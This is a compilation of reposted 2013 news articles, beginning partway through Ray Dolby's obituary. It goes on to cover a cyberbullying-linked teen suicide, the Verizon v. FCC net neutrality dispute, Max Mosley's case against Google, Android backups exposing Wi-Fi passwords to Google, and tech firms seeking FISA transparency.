Film industry executives credit Dr. Dolby with developing sophisticated technologies that enabled directors like Steven Spielberg to endow sound with the same emotional intensity as pictures. “In ‘Close Encounters of the Third Kind,’ the sound of the spaceship knocked the audience on its rear with the emotional content,” said Sidney Ganis, a film producer who is a former president of Paramount Pictures and a former president of the American Academy of Motion Picture Arts and Sciences. “That was created by the director, but provided by the technology that Ray Dolby invented.”

Over the course of Dr. Dolby’s career, the Dolby name became synonymous with high fidelity. For his pioneering contributions to audio engineering, Dr. Dolby received an Oscar, several Emmy Awards and a Grammy. He was also awarded the National Medal of Technology and Innovation by President Clinton and was appointed a Member of the Most Excellent Order of the British Empire by Queen Elizabeth II.

Trained in engineering and physics, Dr. Dolby started Dolby Laboratories in London in 1965 and soon after introduced technology that produced cleaner, crisper sound by electronically reducing the hiss generated by analog tape recording.

Decca Records was the first customer to buy the Dolby System. The noise-reduction technology quickly became a staple of major record labels.

By the 1970s, film studios began adopting the system as well. It was first used in 1971 in “A Clockwork Orange.” In the 1980s, the company introduced its digital surround sound technology into home entertainment.

Ray M. Dolby was born on Jan. 18, 1933, in Portland, Ore., the son of Earl Dolby, a salesman, and Esther Dolby. He was interested in how sound worked from a young age and took clarinet lessons.

As a teenager, he met Alexander Poniatoff, a Russian émigré and electrical engineer who had started an electronics company called Ampex that made tape recorders. Mr. Dolby worked at Ampex from 1949 to 1957 where, among other projects, he developed the electronic components of the company’s videotape recording system.

Mr. Dolby graduated from Stanford University in 1957 with a bachelor’s degree in electrical engineering. That year, he left Ampex to pursue graduate studies at Cambridge University in Britain on a Marshall Scholarship and a fellowship from the National Science Foundation. He received a postdoctoral degree in physics from Cambridge in 1961. While at Cambridge, he met a summer student named Dagmar Bäumert whom he later married.

In 1963, Dr. Dolby traveled to India as an adviser for the United Nations, returning two years later to England where he founded Dolby Laboratories.

In 1976, he moved to San Francisco where the company still has its headquarters. The next year, the company gained wider renown after the release of “Star Wars” and “Close Encounters of the Third Kind,” which each used Dolby Stereo, a system for recording films in multichannel sound. In the 1980s, Dolby Labs introduced surround sound technology in television, compact discs, and laser discs.

Dr. Dolby served as chairman of the Dolby board from 1965 until 2009, retiring from the board in 2011. He is survived by his wife, Dagmar; two sons, Tom Dolby of Manhattan and David Dolby of San Francisco; and four grandchildren.

In 2012, in Dr. Dolby’s honor, the auditorium that is home to the Academy Awards, formerly known as the Kodak Theatre, was renamed the Dolby Theater.
http://www.nytimes.com/2013/09/13/bu...ead-at-80.html





Girl’s Suicide Points to Rise in Apps Used by Cyberbullies
Lizette Alvarez

The clues were buried in her bedroom. Before leaving for school on Monday morning, Rebecca Ann Sedwick had hidden her schoolbooks under a pile of clothes and left her cellphone behind, a rare lapse for a 12-year-old girl.

Inside her phone’s virtual world, she had changed her user name on Kik Messenger, a cellphone application, to “That Dead Girl” and delivered a message to two friends, saying goodbye forever. Then she climbed a platform at an abandoned cement plant near her home in the Central Florida city of Lakeland and leaped to the ground, the Polk County sheriff said.

In jumping, Rebecca became one of the youngest members of a growing list of children and teenagers apparently driven to suicide, at least in part, after being maligned, threatened and taunted online, mostly through a new collection of texting and photo-sharing cellphone applications. Her suicide raises new questions about the proliferation and popularity of these applications and Web sites among children and the ability of parents to keep up with their children’s online relationships.

For more than a year, Rebecca, pretty and smart, was cyberbullied by a coterie of 15 middle-school children who urged her to kill herself, her mother said. The Polk County sheriff’s office is investigating the role of cyberbullying in the suicide and considering filing charges against the middle-school students who apparently barraged Rebecca with hostile text messages. Florida passed a law this year making it easier to bring felony charges in online bullying cases.

Rebecca was “absolutely terrorized on social media,” Sheriff Grady Judd of Polk County said at a news conference this week.

Along with her grief, Rebecca’s mother, Tricia Norman, faces the frustration of wondering what else she could have done. She complained to school officials for several months about the bullying, and when little changed, she pulled Rebecca out of school. She closed down her daughter’s Facebook page and took her cellphone away. She changed her number. Rebecca was so distraught in December that she began to cut herself, so her mother had her hospitalized and got her counseling. As best she could, Ms. Norman said, she kept tabs on Rebecca’s social media footprint.

It all seemed to be working, she said. Rebecca appeared content at her new school as a seventh grader. She was gearing up to audition for chorus and was considering slipping into her cheerleading uniform once again. But unknown to her mother, Rebecca had recently signed on to new applications — ask.fm, and Kik and Voxer — which kick-started the messaging and bullying once again.

“I had never even heard of them; I did go through her phone but didn’t even know,” said Ms. Norman, 42, who works in customer service. “I had no reason to even think that anything was going on. She was laughing and joking.”

Sheriff Judd said Rebecca had been using these messaging applications to send and receive texts and photographs. His office showed Ms. Norman the messages and photos, including one of Rebecca with razor blades on her arms and cuts on her body. The texts were full of hate, her mother said: “Why are you still alive?” “You’re ugly.”

One said, “Can u die please?” To which Rebecca responded, with a flash of resilience, “Nope but I can live.” Her family said the bullying began with a dispute over a boy Rebecca dated for a while. But Rebecca had stopped seeing him, they said.

Rebecca was not nearly as resilient as she was letting on. Not long before her death, she had clicked on questions online that explored suicide. “How many Advil do you have to take to die?”

In hindsight, Ms. Norman wonders whether Rebecca kept her distress from her family because she feared her mother might take away her cellphone again.

“Maybe she thought she could handle it on her own,” Ms. Norman said.

It is impossible to be certain what role the online abuse may have played in her death. But cyberbullying experts said cellphone messaging applications are proliferating so quickly that it is increasingly difficult for parents to keep pace with their children’s complex digital lives.

“It’s a whole new culture, and the thing is that as adults, we don’t know anything about it because it’s changing every single day,” said Denise Marzullo, the chief executive of Mental Health America of Northeast Florida in Jacksonville, who works with the schools there on bullying issues.

No sooner has a parent deciphered Facebook or Twitter or Instagram than his or her children have migrated to the latest frontier. “It’s all of these small ones where all this is happening,” Ms. Marzullo said.

In Britain, a number of suicides by young people have been linked to ask.fm, and online petitions have been started there and here to make the site more responsive to bullying. The company ultimately responded this year by introducing an easy-to-see button to report bullying and saying it would hire more moderators.

“You hear about this all the time,” Ms. Norman said of cyberbullying. “I never, ever thought it would happen to me or my daughter.”

Questions have also been raised about whether Rebecca’s old school, Crystal Lake Middle School, did enough last year to help stop the bullying; some of it, including pushing and hitting, took place on school grounds. The same students also appear to be involved in sending out the hate-filled online messages away from school, something schools can also address.

Nancy Woolcock, the assistant superintendent in charge of antibullying programs for Polk County Schools, said the school received one bullying complaint from Rebecca and her mother in December about traditional bullying, not cyberbullying. After law enforcement investigated, Rebecca’s class schedule was changed. Ms. Woolcock said the school also has an extensive antibullying campaign and takes reports seriously.

But Ms. Norman said the school should have done more. Officials told her that Rebecca would receive an escort as she switched classes, but that did not happen, she said.

Rebecca never boarded her school bus on Monday morning. She made her way to the abandoned Cemex plant about 10 minutes away from her modest mobile home; the plant was a place she had used as a getaway a few times when she wanted to vanish. Somehow, she got past the high chain-link fence topped with barbed wire, which is now a memorial, with teddy bears, candles and balloons. She climbed a tower and then jumped.

“Don’t ignore your kids,” Ms. Norman said, “even if they seem fine.”

Lance Speere contributed reporting from Lakeland, Fla., and Alan Blinder from Atlanta.
http://www.nytimes.com/2013/09/14/us...web-sites.html





Verizon and F.C.C. Net Neutrality Battle Set in District Court
Edward Wyatt

Few people would dispute that one of the biggest contributors to the extraordinary success of the Internet has been the ability of just about anyone to use it to offer any product, service or type of information he or she wants.

How to maintain that success, however, is the subject of a momentous fight that resumes this week in the United States Court of Appeals for the District of Columbia Circuit. The battle pits one of the largest providers of Internet access, Verizon, against the Federal Communications Commission, which for nearly 80 years has been riding herd on the companies that provide Americans with telecommunications services.

Verizon and a host of other companies that spent billions of dollars to build their Internet pipelines say they should be able to manage them as they wish. They should be able, for example, to charge fees to content providers who are willing to pay to have their data transported to customers through an express lane. That, the companies say, would allow the pipeline owner to reap the benefits of its investment.

The F.C.C., however, says that Internet service providers must keep their pipelines free and open, giving the creators of any type of legal content — movies, shopping sites, medical services or even pornography — an equal ability to reach consumers. If certain players are able to buy greater access to Internet users, regulators say, the playing field will tilt in the direction of the richest companies, possibly preventing the next Google or Facebook from getting off the ground.

The court is set to hear oral arguments starting Monday morning in Verizon v. F.C.C., which is billed as a heavyweight championship of the technology world, setting the old era against the new.

“This will determine whether the laws and regulations of the past, the pre-Internet age, will apply to the Internet’s future,” said Scott Cleland, the chairman of NetCompetition, a group sponsored by broadband companies, including Verizon. “It will determine the regulatory power and authority of the F.C.C. in the 21st century.”

Susan Crawford, a supporter of the F.C.C.’s position who is co-director of the Berkman Center for Internet and Society at Harvard and a professor at Yeshiva University’s Cardozo School of Law, called the showdown “a moment of grandeur.”

“The question presented by the case is does the U.S. government have any role to play when it comes to ensuring ubiquitous, open, world-class, interconnected, reasonably priced Internet access?” Ms. Crawford said. “Does the government have good reason to ensure that facility in America?”

European countries are similarly struggling with whether and how to regulate Internet service. The Netherlands has some wireless regulations in place, and France this year introduced strict anti-discrimination measures. But while European Union officials have expressed support for what is known as net neutrality, a recent proposal gives Internet providers more leeway to manage services than many neutrality supports liked. In December 2010, the F.C.C. issued its “Open Internet Order,” an 87-page set of instructions directing Internet service providers not to block or to unreasonably discriminate against any type of Internet traffic deemed not harmful to the system. The only exception to the open access principle is for “reasonable network management,” a loosely defined term that allows a company to do what it takes to keep its network up and running.

Internet service providers were also ordered to disclose how they manage their networks and how their systems perform — like how they handle congestion when a large portion of users are, for example, downloading high-definition video.

The order was necessary, the F.C.C. said in court papers, because “there were significant threats to openness, and thus to the engine that has driven investment in broadband facilities.” In the past, the F.C.C. said, “several broadband access providers had blocked or degraded service.” One was Comcast, which in 2008 was punished by the F.C.C. for blocking access by some of its users to the file-sharing service BitTorrent, which was often used for the unauthorized exchange of movies or music.

“Other providers have the technological capability and the economic incentive to engage in similar acts,” the commission said. “And with the majority of Americans having only two wireline broadband choices (many have only one), market discipline alone could not guarantee continued openness.” The F.C.C.’s rules generally are more strict for wireless carriers, because those networks are more susceptible to congestion.

In the Comcast case, the cable company appealed the F.C.C. ruling, and the Washington federal appeals court — the same court hearing the Verizon case — said in 2010 that the agency had overstepped its bounds, failing to show that it had the authority to regulate an Internet service provider.

It is, in fact, far from easy for the F.C.C. to demonstrate that it has such authority. That is because in 2002, the commission, then led by Michael K. Powell, a Republican, voted to classify Internet service as an information service rather than a telecommunications service.

The difference meant that Internet providers were not subject to regulation like a telephone company. Instead, they were free of restrictions on rates and exempt from regulations that would require them to open their networks to allow competitors to offer lower-cost service over the same pipes.

The judge who wrote the Comcast decision, David S. Tatel, is one member of the three-judge panel that will hear Verizon’s appeal. Many industry experts view the two other judges as highly likely to take opposing sides, leaving Judge Tatel as the swing vote.

Verizon argues that the F.C.C.’s Open Internet Order should be struck down because it is arbitrary and capricious, and aims to prevent activity that is not taking place. It argues in its court filings that the commission has documented only four examples, over six years, of purported blocking of Internet content by service providers.

During those six years, the company said, “end users successfully accessed the Internet content, applications and services of their choice literally billions of times.”

More broadly, Verizon argues that the F.C.C., as in the Comcast case, “fails to identify any statutory authority for the rules.” And in fact, Verizon said, the F.C.C. order is so broad that it would give the commission the power “to regulate all sectors of the Internet economy without limit.”

The court is likely to take several months to issue its decision, lawyers involved in the case say — perhaps before the end of the year, but more likely in 2014. When the ruling comes, many people will be waiting. More than 400 organizations or individuals weighed in at the F.C.C. when the rules were being considered. More than 60 signed legal briefs supporting the commission, while at least a dozen did so backing Verizon.
http://www.nytimes.com/2013/09/09/bu...ict-court.html





Judges Hear Arguments on Rules for Internet
Edward Wyatt

In a momentous battle over whether the Web should remain free and open, members of a federal appeals court expressed doubt over a government requirement that Internet service providers treat all traffic equally.

On Monday, the Federal Communications Commission and Verizon, one of the largest Internet service providers, squared off in a two-hour session of oral arguments — three times as long as was scheduled. As Verizon pushed for the authority to manage its own pipes, the government argued that creators of legal content should have equal access to Internet users, lest big players gain an unfair advantage.

But two judges appeared deeply skeptical that the F.C.C. had the authority to regulate the Internet in that manner.

The two jurists, Judge Laurence H. Silberman and Judge David S. Tatel, said that the agency’s anti-discrimination rule — which requires an Internet service provider to give all traffic that travels through its pipes the same priority — illegally imposed rules meant for telephones on the infrastructure of the Web. The F.C.C. itself disallowed the telephone-type regulation a decade ago.

The third judge, Judith W. Rogers, did not ask as many questions but appeared to accept much of the F.C.C.’s position.

Consumers could experience a significant change in the Internet if the United States Court of Appeals for the District of Columbia Circuit strikes down the F.C.C.’s requirement, called the Open Internet Order.

Currently, companies that offer goods or services online do not have to pay anything to get their content to consumers. If Internet service providers started charging fees to reach customers more quickly, large, wealthy companies like Google and Facebook would have an edge, the F.C.C. says. The government argued that such a tiered service could cause small, start-up companies with little money to pay for their access — the next Google or Facebook, perhaps — to wither on the vine.

In any case, the added costs would be likely to be passed on to consumers.

The case, which is expected to be decided late this year or early next year, has attracted enormous interest. On Monday, telecommunications lawyers began lining up to get into the courtroom two and a half hours before the session was scheduled to start. The session was standing room only, with many others left to listen in an adjacent overflow room.

The judges were not entirely hostile to the F.C.C.’s arguments. Judge Tatel, who many telecommunications analysts expect to be the swing vote on the case, pushed lawyers on both sides to concede that the part of the F.C.C. rule that prohibits outright blocking of online content or applications could be allowed.

Judge Tatel also queried each side on whether the two main provisions of the Open Internet Order — no blocking and no discrimination — had to be taken as a whole or could be separated, with the no-blocking rule being upheld.

An opinion that voided one provision yet upheld the other would be more likely to be appealed to the Supreme Court, telecommunications lawyers said, because neither side would be completely happy with the decision.

Helgi C. Walker of the law firm Wiley Rein, who argued the case on behalf of Verizon, said the rules had to be struck down as a whole. Congress never intended the F.C.C. to have authority to regulate the Internet, she said.

Sean A. Lev, who argued the case for the agency, told the judges that the F.C.C. did have the authority to govern the Internet under numerous parts of the Telecommunications Act, including one that gives the commission the duty to work to expand broadband access. Companies that have equal access to consumers are encouraged to innovate, Mr. Lev said, adding that it would result in more vibrant start-ups and a growth in demand for Internet service.

The judges themselves seemed intent on viewing the case from as many sides as possible. Each side was scheduled 20 minutes to present its case and answer questions from the justices. But after spending 30 minutes on Verizon’s presentation, the judges proceeded to grill the F.C.C.’s lawyer for a full hour.

The remainder of the two-hour session was spent hearing from a lawyer representing public-interest groups, who joined the lawsuit on the F.C.C.’s side, and a rebuttal from Verizon.

The F.C.C.’s uphill battle, in part, reflects politics and past decisions by the agency. In 2002, its chairman at the time, Michael K. Powell, a Republican, got the majority of the commission to agree that the Internet was not a telecommunications service like the telephone system. Instead, it classified the Web as an information service, making it subject to much lighter regulation.
http://www.nytimes.com/2013/09/10/te...-internet.html





Verizon's Diabolical Plan to Turn the Web into Pay-Per-View
Bill Snyder

Think of all the things that tick you off about cable TV. Along with brainless programming and crummy customer service, the very worst aspect of it is forced bundling. You can't pay just for the couple of dozen channels you actually watch. Instead, you have to pay for a couple of hundred channels, because the good stuff is scattered among a number of overstuffed packages.

Now, imagine that the Internet worked that way. You'd hate it, of course. But that's the direction that Verizon, with the support of many wired and wireless carriers, would like to push the Web. That's not hypothetical. The country's No. 1 carrier is fighting in court [1] to end the Federal Communications Commission's policy of Net neutrality, a move that would open the gates to a whole new -- and wholly bad -- economic model on the Web.

As it stands now, you pay your Internet service provider and go wherever you want on the Web. Packets of bits are just packets and have to be treated equally. That's the essence of Net neutrality. But Verizon's plan, which the company has outlined during hearings in federal court and before Congress, would change that. Verizon and its allies would like to charge websites that carry popular content for the privilege of moving their packets to your connected device. Again, that's not hypothetical.

ESPN, for example, is in negotiations [4] with at least one major cellular carrier to pay to exempt its content from subscribers' cellular data caps. And what's wrong with that? Well, ESPN is big and rich and can pay for that exemption, but other content providers -- think of your local jazz station that streams audio -- couldn't afford it and would be out of business. Or, they'd make you pay to visit their websites. Indeed, if that system had been in place 10 years ago, fledglings like Google or YouTube or Facebook might never have gotten out of the nest.

Susan Crawford, a tech policy expert and professor at Yeshiva University's Benjamin N. Cardozo School of Law, says Verizon wants to "cable-ize the Internet." She writes in her blog [5] that "The question presented by the case is: Does the U.S. government have any role in ensuring ubiquitous, open, world-class, interconnected, reasonably priced Internet access?"

Verizon and other carriers answer that question by saying no.

They argue that because they spent megabucks to build and maintain the network, they should be able to have a say over what content travels over it. They say that because Google and Facebook and other Internet companies make money by moving traffic over "their" networks, they should get a bigger piece of the action. (Never mind that pretty much every person and business that accesses Google or Facebook is already paying for the privilege, and paying more while getting less speed than users in most of Europe.)

In 2005, AT&T CEO Ed Whitacre famously remarked [6] that upstarts like Google would like to "use my pipes free, but I ain't going to let them do that because we have spent this capital and we have to have a return on it."

That's bad enough, but Verizon goes even further. It claims that it has a right to free speech and, like a newspaper that may or may not publish a story about something, it can choose which content it chooses to carry. "Broadband providers possess 'editorial discretion.' Just as a newspaper is entitled to decide which content to publish and where, broadband providers may feature some content over others," Verizon's lawyers argue in a brief (PDF) [7].

That's so crazy I won't bother to address it. But the FCC has done such a poor job of spelling out what it thinks it has the right to regulate and how that should work that the door is wide open for the carriers' bizarre -- not to mention anticonsumer -- strategies and arguments.

I don't want to get down in the regulatory weeds, but there is one bit of legalese that's worth knowing: common carrier. Simply put, it means that the company doing the shipping can't mess with the contents. A railroad is a common carrier, and as such it can't decide whose cargo it will carry and whose it won't.

Before railroads were common carriers, they did things like favor products made by John D. Rockefeller's Standard Oil, which made him even richer and also led to the creation of a wildly out-of-control monopoly. (Yeshiva's Crawford has an in-depth but readable explanation of these issues in her book "Captive Audience: The Telecom Industry and Monopoly Power in the New Gilded Age [8]."

But the FCC has never ruled that ISPs are common carriers, partly because it's afraid of the power of the lobbyists to influence Congress and partly because its directors lack spine. And now that lack of spine is about to bite the butt of everyone who uses the Web.

According to people who follow this stuff closely, because ISPs are not common carriers the judges on the U.S. Court of Appeals in Washington, D.C., are looking askance at the FCC's defense against Verizon's lawsuit, although a verdict isn't likely for months.

Here are the stakes: "If Verizon -- or any ISP -- can go to a website and demand extra money just to reach Verizon subscribers, the fundamental fairness of competing on the Internet would be disrupted. It would immediately make Verizon the gatekeeper to what would and would not succeed online. ISPs -- not users, not the market -- would decide which websites and services succeed," writes Michael Weinberg, vice president of Public Knowledge, a digital advocacy group.

A taste of the Web's future: The Time Warner vs. CBS dustup
You don't have to wait for the Verizon verdict to get a taste of what the New Web Order would be like. Time Warner Cable and CBS just had a dustup over how much Time Warner would pay CBS to carry its programming. When the pair couldn't agree, the cable giant stopped carrying CBS programming in New York City, Los Angeles, and Dallas. CBS then retaliated by stopping Time Warner subscribers from streaming its programming over the Internet.

They settled after about a month. Staying true to form, Time Warner refused to give customers a rebate as compensation for lost programming.

That's not exactly the same issue that we're facing in the fight over Net neutrality, but it should give you a sense of what life is like when the giants fight it out over what you're allowed to access and for how much. Users get caught in the middle, and the rights we've taken for granted simply disappear.
http://www.infoworld.com/d/the-indus...ay-view-226662





Google in Fight Over Content That Appears in Search Results
David Jolly

Max Mosley, the former president of the International Automobile Federation, might be forgiven for wanting Google to filter certain search results.

Mr. Mosley was the victim of a spectacular 2008 sting by News of the World — Rupert Murdoch’s disgraced, and now defunct, tabloid weekly — which posted photos and video of him participating in a sadomasochistic sex party that the paper described as “a sick Nazi orgy with hookers.”

The Nazi claim, in particular, was a bitter one; the son of Sir Oswald Mosley, a World War II-era British fascist, Mr. Mosley has long bristled at the suggestion of Nazi sympathies. He sued News of the World in a London court for breach of privacy and was awarded £60,000, or about $94,000, in damages.

The High Court ruled that there was “no evidence” that the sex party had been “intended to be an enactment of Nazi behavior or adoption of any of its attitudes.” It also found that there had been “no public interest or other justification for the clandestine recording.”

The court ordered News of the World to remove the material in question from the Web, naturally, and there the story might have ended. Except, of course, that the photos and video continue to live on the Internet, via social media and on Web sites maintained by individuals. Mr. Mosley has been fighting ever since to make them disappear.

And that is where Google comes in: Mr. Mosley asked a Paris court during the past week to order the Internet giant to create an algorithm to filter all such photos from its service and search engine, now and forever. His lawyer told the court, the Tribunal de Grande Instance, that if Google France refused to remove the offending images it should face fines.

The French court said it would issue a ruling on Oct. 21. Mr. Mosley has filed a similar case in Hamburg that is to be heard this month.

Google strongly disputes any responsibility.

“We sympathize with Mr. Mosley’s situation,” Google said in a statement, noting that it had always honored his requests to remove obviously incriminating links. “But his proposal to filter the Web would censor legitimate speech, restrict access to information, and stifle innovation.”

The company noted that there was already a solution to the problem: “Going after the actual publishers of the material, and working with Google through our existing and effective removals process.”

Google says that it has already taken down “hundreds of pages” with images that obviously infringe on the court ruling when it is requested to do so, but that there are many cases in which it is not immediately clear whether the content is affected by the ruling, and that in those cases a judge or other competent official should make the decision.

It cites French and E.U. law, which do not require search engines to comb the Web for unlawful content, and it argues that, in any case, many of the hits the photos receive are driven by communications among individuals, so blocking them on search would not end the problem.

A concurrent case, at the European level, would appear to back Google. The European Court of Justice, which is based in Luxembourg, is currently examining a Spanish man’s claim of a “right to be forgotten” on the Web — something Silicon Valley companies oppose.

In a sign that the case might be swinging the technology giants’ way, Niilo Jaaskinen, the Finnish lawyer who serves as advocate general of the court, issued an opinion in June that search engines were not responsible “for personal data appearing on Web pages they process.”

E.U. data protection law “does not entitle a person to restrict or terminate dissemination of personal data that he considers to be harmful or contrary to his interests,” Mr. Jaaskinen wrote. Though the court is not bound by the advocate general’s opinion, it often follows his recommendations. It has yet to decide the matter.

Why would Mr. Mosley seek action against an American company in a French court for actions committed in Britain by a now-defunct English newspaper? It might have to do with France’s strict privacy laws, which make it a criminal offense to record another person — image or sound — in a private space without the person’s consent.

His lawyer, Clara S. Zerbib, said that it was because a Paris court had ruled in 2011 that the recording of the News of the World pictures, without Mr. Mosley’s knowledge in a private place, had been illegal and that a judge might thus find that distributing such pictures on the Internet was also illegal. She noted that Mr. Mosley also worked in France as president of the International Automobile Federation, the Paris-based governing body of Formula One racing, and was concerned about his reputation there.

Mr. Mosley, in a telephone interview, said that Google had been helpful, if not always swift, in answering his requests to remove photos but that he should not have to constantly ask them to do so, since the court ruling had made plain that they were illicit.

“We shouldn’t have to keep asking them every time these photos come up,” Mr. Mosley said. “You have to employ someone to look every day. They shouldn’t put them up in the first place.”

He acknowledged that by fighting Google in court, he was inevitably attracting additional attention, but that he had to do it, because “anybody who’s interested in me will Google me, and the first thing they see are these photos.”

Mr. Mosley and his legal team say there do not appear to be any technical barriers to Google’s doing what he is asking. Google, working to address British concerns about child pornography on the Web, said in June that it had the capacity to identify and block images automatically, using “hashing” technology.

“If you have any respect for the rule of law, and it’s been decided by the court that it’s illegal, then you shouldn’t reproduce them,” he said.

But Google is adamant that the automatic filter Mr. Mosley is demanding would be a blunt tool that would indiscriminately eliminate both lawful and unlawful content, including perhaps reporting on Mr. Mosley’s own case.

“We hope that the French court will not order us to build a censorship machine,” the company said.
http://www.nytimes.com/2013/09/09/te...h-results.html





Google Knows Nearly Every Wi-Fi Password in the World
Michael Horowitz

If an Android device (phone or tablet) has ever logged on to a particular Wi-Fi network, then Google probably knows the Wi-Fi password. Considering how many Android devices there are, it is likely that Google can access most Wi-Fi passwords worldwide.

Recently IDC reported [1] that 187 million Android phones were shipped in the second quarter of this year. That multiplies out to 748 million phones [2] in 2013, a figure that does not include Android tablets.

Many (probably most) of these Android phones and tablets are phoning home to Google, backing up Wi-Fi passwords along with other assorted settings. And, although they have never said so directly, it is obvious that Google can read the passwords.

Sounds like a James Bond movie.

Android devices have defaulted to coughing up Wi-Fi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn't change it. I suspect that many Android users have never even seen the configuration option controlling this. After all, there are dozens and dozens of system settings to configure.

And, anyone who does run across the setting can not hope to understand the privacy implication. I certainly did not.

Specifically:
In Android 2.3.4, go to Settings, then Privacy. On an HTC device, the option that gives Google your Wi-Fi password is "Back up my settings". On a Samsung device, the option is called "Back up my data". The only description is "Back up current settings and application data". No mention is made of Wi-Fi passwords.
In Android 4.2, go to Settings, then "Backup and reset". The option is called "Back up my data". The description says "Back up application data, Wi-Fi passwords, and other settings to Google servers".

Needless to say "settings" and "application data" are vague terms. A longer explanation of this backup feature in Android 2.3.4 can be found in the Users Guide [3] on page 374:

Check to back up some of your personal data to Google servers, with your Google Account. If you replace your phone, you can restore the data you’ve backed up, the first time you sign in with your Google Account. If you check this option, a wide variety of you personal data is backed up, including your Wi-Fi passwords, Browser bookmarks, a list of the applications you’ve installed, the words you’ve added to the dictionary used by the onscreen keyboard, and most of the settings that you configure with the Settings application. Some third-party applications may also take advantage of this feature, so you can restore your data if you reinstall an application. If you uncheck this option, you stop backing up your data to your account, and any existing backups are deleted from Google servers.

A longer explanation for Android 4.0 can be found on page 97 of the Galaxy Nexus phone users Guide: [4]

If you check this option, a wide variety of your personal data is backed up automatically, including your Wi-Fi passwords, Browser bookmarks, a list of the apps you've installed from the Market app, the words you've added to the dictionary used by the onscreen keyboard, and most of your customized settings. Some third-party apps may also take advantage of this feature, so you can restore your data if you reinstall an app. If you uncheck this option, your data stops getting backed up, and any existing backups are deleted from Google servers.

Sounds great. Backing up your data/settings makes moving to a new Android device much easier. It lets Google configure your new Android device very much like your old one.

What is not said, is that Google can read the Wi-Fi passwords.

And, if you are reading this and thinking about one Wi-Fi network, be aware that Android devices remember the passwords to every Wi-Fi network they have logged on to. The Register writes [5]

The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents.

The good news is that Android owners can opt out just by turning off the checkbox.

The bad news is that, like any American company, Google can be compelled by agencies of the U.S. government to silently spill the beans.

When it comes to Wi-Fi, the NSA, CIA and FBI may not need hackers and cryptographers. They may not need to exploit WPS [6] or UPnP [7]. If Android devices are offering up your secrets, WPA2 encryption and a long random password offer no protection.

I doubt that Google wants to rat out their own customers. They may simply have no choice. What large public American company would? Just yesterday, Marissa Mayer, the CEO of Yahoo, said executives faced jail [8] if they revealed government secrets. Lavabit felt there was a choice, but it was a single person operation.

This is not to pick on Google exclusively. After all, Dropbox can read the files you store with them. So too, can Microsoft read files stored in SkyDrive. And, although the Washington Post reported back in April that Apple’s iMessage encryption foils law enforcement [9], cryptographer Matthew Green did a simple experiment that showed that Apple can read your iMessages [10].

In fact, Green's experiment is pretty much the same one that shows that Google can read Wi-Fi passwords. He describes it:

First, lose your iPhone. Now change your password using Apple's iForgot service ... Now go to an Apple store and shell out a fortune buying a new phone. If you can recover your recent iMessages onto a new iPhone -- as I was able to do in an Apple store this afternoon -- then Apple isn't protecting your iMessages with your password or with a device key. Too bad.

Similarly, a brand new Android device can connect to Wi-Fi hotspots it is seeing for the very first time.

Back in June 2011, writing for TechRepublic, Donovan Colbert described stumbling across this [11] on a new ASUS Eee PC Transformer tablet:

I purchased the machine late last night after work. I brought it home, set it up to charge overnight, and went to bed. This morning when I woke I put it in my bag and brought it to the office with me. I set up my Google account on the device, and then realized I had no network connection ... I pulled out my Virgin Mobile Mi-Fi 2200 personal hotspot and turned it on. I searched around Honeycomb looking for the control panel to select the hotspot and enter the encryption key. To my surprise, I found that the Eee Pad had already found the Virgin hotspot, and successfully attached to it ... As I looked further into this puzzling situation, I noticed that not only was my Virgin Hotspot discovered and attached, but a list of other hotspots ... were also listed in the Eee Pad's hotspot list. The only conclusion that one can draw from this is obvious - Google is storing not only a list of what hotspots you have visited, but any private encryption keys necessary to connect to those hotspots ...

Micah Lee [12], staff technologist at the EFF, CTO of the Freedom of the Press Foundation and the maintainer of HTTPS Everywhere [13], blogged about the same situation [14] back in July.

When you format an Android phone and set it up on first run, after you login to your Google account and restore your backup, it immediately connects to wifi using a saved password. There’s no sort of password hash that your Android phone could send your router to authenticate besides the password itself.

Google stores the passwords in a manner such that they can decrypt them, given only a Gmail address and password.

Shortly after Lee's blog, Ars Technica picked up on this (see Does NSA know your Wi-Fi password? Android backups may give it to them [15]). A Google spokesperson responded to the Ars article with a prepared statement.

Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch. At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks.

Sean Gallagher, who wrote the Ars article, added "The spokesperson could not speak to how ... the data was secured at rest."

Lee responded [16] to this with:

... it’s great the backup/restore feature is optional. It’s great that if you turn it off Google will delete your data. It’s great that the data is encrypted in transit between the Android device and Google’s servers, so that eavesdroppers can’t pull your backup data off the wire. And it’s great they they have strong security, both digital and physical, at their data centers. However, Google’s statement doesn’t mention whether or not Google itself has access to the plaintext backup data (it does)... [The issue is] Not how easy it is for an attacker to get at this data, but how easy it is for an authorized Google employee to get at it as part of their job. This is important because if Google has access to this plaintext data, they can be compelled to give it to the US government.

Google danced around the issue of whether they can read the passwords because they don't want people like me writing blogs like this. Maybe this is why Apple, so often, says nothing.

Eventually Lee filed an official Android feature request [17], asking Google to offer backups that are stored in such a way that only the end user (you and I) can access the data. The request was filed about two months ago and has been ignored by Google.

I am not revealing anything new here. All this has been out in the public before. Below is a partial list of previous articles.

However, this story has, on the whole, flown under the radar. Most tech outlets didn't cover it (Ars Technica and The Register being exceptions) for reasons that escape me.
http://blogs.computerworld.com/andro...password-world





Google, Yahoo, Facebook Request NSL Transparency, Public Hearings from FISA Court
Michael Mimoso

Google, Yahoo and Facebook filed amended requests today with the U.S. Foreign Intelligence Surveillance Court (FISC) reiterating their desire to publish numbers on requests for user data related to national security. Google, meanwhile, went a step further asking for an open, public hearing with the court so that the issue could be publicly debated.

The U.S. government prohibits companies from disclosing the number of requests received for user data under a number of national security statutes. All three have published transparency reports that describe a range for the total number of requests received and the number of users associated with those requests, but specifics on requests related to national security are not allowed to be published.

Google was the first to make such a public request, when in June it filed a motion days after the first of Edward Snowden’s revelations about the NSA’s data collection practices under the Patriot Act and its PRISM program. Google cited media reports, pointing to articles in the Guardian UK newspaper and The Washington Post alleging that the NSA had “direct access” to Google data. Google immediately denied these claims and petitioned FISC and Attorney General Eric Holder for permission to publish national security data.

Citing legal precedent, Google wants public access to the proceedings it said, in addition to being able to publish the total number of compulsory national security-related requests and the number of users or accounts associated with those requests.

